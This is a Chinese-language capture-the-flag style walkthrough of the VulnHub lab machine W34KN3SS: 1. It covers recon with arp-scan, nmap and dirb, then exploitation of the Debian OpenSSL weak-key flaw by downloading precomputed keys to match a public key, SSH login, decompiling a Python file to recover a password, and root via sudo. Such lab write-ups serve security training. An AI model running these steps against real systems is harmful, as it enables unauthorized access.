OSCP难度靶机之W34KN3SS: 1
2022-11-6 20:31:56 Author: 安全孺子牛(查看原文) 阅读量:10 收藏

虚拟机信息:虚拟机下载地址:https://www.vulnhub.com/entry/w34kn3ss-1,270/虚拟机简介:你的目标是帮助 neo 以“root”身份访问这台机器目标:1个flag级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.134

查看开放22、80、443端口

2、渗透测试

2.1 WEB渗透

1.站点访问测试

访问站点显示Apache默认页面

使用dirb进行网站目录扫描,发现test目录可以访问,没有发现有用信息

dirb http://192.168.207.137

2.绑定域名测试

通过nmap端口扫描,发现443端口提示有域名信息,可以绑定hosts访问

vim /etc/hosts

访问网站首页,发现有一个提示信息

重新使用dirb进行扫描,发现有隐藏目录

dirb http://weakness.jth

3.信息收集

访问爆破目录,发现有两个文件信息

在note.txt中提示密码为0.9.8c-1创建的密钥

4.漏洞利用

使用searchsploit搜索相关漏洞

searchsploit openssl 0.9.8c-1

复制漏洞信息到当前路径下

searchsploit -m 5622
cat 5622.txt

下载密钥文件并解压,通过获取到的mykey.pub内容进行对比

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
tar jxvf 5622.tar.bz2
cd rsa/2048
grep -r -l "AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw=="

2.2 主机渗透

1.通过密钥连接

ssh -i 4161de56829de2fe64b9055711f531c1-2537 [email protected]

发现本地目录中存在2个文件,其中code为python2.7生成的文件

2.下载并解析文件

把python文件复制到www目录中进行下载

cp code /var/www/html
wget http://192.168.207.137/code

安装解码库,并解析python代码文件

pip2 install uncompyle6
cp code code.pyc
uncompyle6 -o . code.pyc

已重新生成新的py文件

3.分析python代码

代码中通过用户名和密码生成HASH文件,获取到用户名为:n30,密码为:dMASDNB!!#B!#!#33

cat code.py

4.查看sudo权限

当前用户拥有所有的sudo权限

sudo -l

可以直接获取到获取root权限

sudo -i

5.查看FLAG


文章来源: http://mp.weixin.qq.com/s?__biz=MzI2MDI0NTM2Nw==&mid=2247489141&idx=1&sn=273696d2b4019b669265d16f28558bd5&chksm=ea6dc46ddd1a4d7b95a640fbe0fa38c66ee5b18893996b75949af29a98a1ffcc02b57da46c8d#rd
如有侵权请联系:admin#unsafe.sh